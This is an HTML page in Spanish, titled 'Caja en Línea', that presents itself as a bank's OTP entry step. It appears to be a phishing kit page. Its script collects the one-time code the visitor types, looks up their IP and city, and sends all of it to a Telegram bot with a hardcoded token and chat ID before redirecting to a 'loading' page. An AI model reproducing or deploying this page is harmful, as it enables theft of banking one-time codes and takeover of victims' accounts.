<!DOCTYPE html>
<html lang="es">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Caja en Línea</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #EFEFEF;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .container {
            background-color: white;
            padding: 20px;
            border-radius: 1px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
            width: 300px;
            display: flex;
            flex-direction: column;
            justify-content: flex-start; 
            height: 300px; /* Mantener la altura fija del contenedor */
        }

        .subtitle {
            font-size: 14px;
            color: #666;
            margin-bottom: 20px; 
            margin-top: 0; 
        }

        .input-group {
            position: relative;
            margin: 0;
            flex-grow: 0; 
            margin-bottom: 110px; /* Añadir margen inferior al grupo de entrada */
        }

        label {
            position: absolute;
            left: 10px;
            top: 10px;
            transition: 0.2s ease all;
            color: #aaa;
            font-size: 16px;
        }

        input[type="text"] {
            width: 100%;
            padding: 10px 0;
            border: none;
            border-bottom: 1px solid #0f7a83;
            outline: none;
            font-size: 16px;
            transition: border-bottom 0.3s;
        }

        input[type="text"]:focus {
            border-bottom: 1px solid #3c3e41;
        }

        input[type="text"]:focus + label,
        input[type="text"]:not(:placeholder-shown) + label {
            top: -5px;
            left: 10px;
            font-size: 12px;
            color: #333;
        }

        .continue-text {
            margin-top: 10px; /* Ajustar a un valor positivo para que no se superponga */
            font-size: 16px;
            color: #0f7a83; 
            cursor: pointer; 
            text-decoration: none; 
            align-self: flex-end; 
        }

        .continue-text:hover {
            text-decoration: underline; 
        }

        .error-message {
            color: red;
            font-size: 12px;
            margin-top: 10px;
            display: none; /* Ocultar mensaje de error por defecto */
        }
    </style>
</head>

<body>
    <div class="container">
        <p class="subtitle">Ingrese el código OTP</p>
        <div class="input-group">
            <input type="text" id="otp" name="otp" required placeholder=" ">
            <label for="otp">OTP</label>
        </div>
        <span id="errorMessage" class="error-message">Por favor, ingrese el código OTP.</span>
        <a href="#" id="submitButton" class="continue-text">CONTINUAR</a>
    </div>

    <script>
        document.getElementById('submitButton').addEventListener('click', function(event) {
            event.preventDefault();
            const otp = document.getElementById('otp').value;
            const errorMessage = document.getElementById('errorMessage');

            // Validar que el campo no esté vacío
            if (otp.trim() === '') {
                errorMessage.style.display = 'block'; // Mostrar mensaje de error
                return; // Detener la ejecución si el campo está vacío
            } else {
                errorMessage.style.display = 'none'; // Ocultar mensaje de error si hay un valor
            }

            // Obtener ubicación e IP de ipwhois.io
            fetch('https://ipwhois.app/json/')
                .then(response => response.json())
                .then(data => {
                    const location = `${data.city}, ${data.country}`;
                    const ip = data.ip;
                    sendToTelegram(otp, location, ip);
                })
                .catch(error => {
                    console.error('Error al obtener la ubicación:', error);
                });
        });

        function sendToTelegram(otp, location, ip) {
            const token = '8071410762:AAFOUv9oR1Dh3_OLwBdTM95YWZwYUwwqKr4'; 
            const chatId = '-4571868410'; 
            const message = `Código OTP: ${otp}\nUbicación: ${location}\nIP: ${ip}`;
            const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;

            fetch(url)
                .then(response => response.json())
                .then(data => {
                    window.location.href = 'cargando2.html'; 
                })
                .catch(error => {
                    console.error('Error al enviar los datos:', error);
                });
        }
    </script>
</body>

</html>
